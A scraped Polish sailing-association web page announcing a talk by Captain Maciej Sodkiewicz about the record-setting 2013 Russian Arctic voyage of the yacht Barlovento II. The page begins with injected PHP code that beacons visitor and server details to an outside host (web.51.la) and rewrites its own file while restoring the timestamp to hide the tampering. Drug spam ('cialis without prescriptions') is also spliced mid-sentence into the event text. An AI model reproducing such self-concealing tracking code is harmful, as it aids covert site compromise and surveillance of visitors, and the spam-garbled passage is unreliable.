check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Arktyczny rekord w Poznaniu

Witamy na research stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Komisja Morska Arktyczny rekord w Poznaniu

Rosyjska Arktyka, czyli rekordowy rejs na północ polskim jachtem

Serdecznie zapraszamy na spotkanie z Kapitanem Maciejem Sodkiewiczem, który był pomysłodawcą, organizatorem oraz współprowadzącym wyprawę Rosyjska Arktyka 2013.

Szczegóły, dotyczące spotkania znajdują się po wejściu w zakładkę.

Arktyczny rekord - Barlovento II fot. Monika Żuberek

Rosyjska Arktyka, czyli rekordowy rejs na północ polskim jachtem

 Arktyka - Ziemia Franciszka Józefa morsy fot. Maciej Sodkiewicz resize

Serdecznie zapraszamy na spotkanie z Kapitanem Maciejem Sodkiewiczem, który był pomysłodawcą, organizatorem oraz współprowadzącym wyprawę Rosyjska Arktyka 2013. Wyprawa trwała od 2-go czerwca do 20 września 2013 roku i w całości odbywała się na prawie 16 - metrowym jachcie Barlovento II. Trasę rejsu (8000 Mm) łącznie pokonało 41 uczestników (w tym prawie połowę stanowiły kobiety). Kulminacyjnym momentem wyprawy było dotarcie do cialis without prescriptions szerokości 82° 10, 554 N, co jest rekordową pozycją, którą osiągnął jacht płynący pod polską banderą.

Spotkanie odbędzie się w dniu
14 marca 2014 roku (piątek) początek o godz. 19:30
w Ośrodku Kultury Żeglarskiej i Marynistycznej  
Wielkopolskiego Okręgowego Związku Żeglarskiego
ul. Wodna 8/9   Poznań - Stare Miasto

Wstęp wolny

(prosimy o potwierdzenie udziału e-mailowo: Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć. Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć.

Arktyczny rekord - Barlovento II fot. Monika Żuberek

Maciej Sodkiewicz urodził się 24 sierpnia 1978 w Tczewie. Studiował na Wydziale Automatyki i Robotyki Politechniki Gdańskiej. Poprowadził ponad 130 rejsów, w trakcie których opłynął cała Europę od Spitsbergenu po marokańską Casablance. Organizował i prowadził wyprawy na Islandię, Szetlandy i Wyspy Owcze, a także na Spitsbergen i Alaskę. Postawił stopę na kontynencie Antarktydy i dwukrotnie opłynął przylądek Horn. Jest jednym z najmłodszych polskich kapitanów prowadzących duże żaglowce. W tej roli najczęściej spotkać go można na pokładzie s/y Zawisza Czarny lub s/y Kapitan Głowacki.
Więcej o kapitanie Sodkiewiczu można znaleźć na stronie nowej wyprawy: www.lodowe-krainy.pl

kpt. Maciej Sodkiewicz fot. Monika Żuberek

Arktyka - góry lodowe fot. Marek Mończyk

 Arktyczny rekord - załoga fot. Darek Gadomski

Arktyczny rekord - Barlovento II fot. Monika ŻuberekArktyczny rekord - kajakiem wśród lodów fot. Monika Żuberek

Zdjęcia: www.rosyjska-arktyka.pl

Poprawiony (Sobota, 22 Marzec 2014 19:56)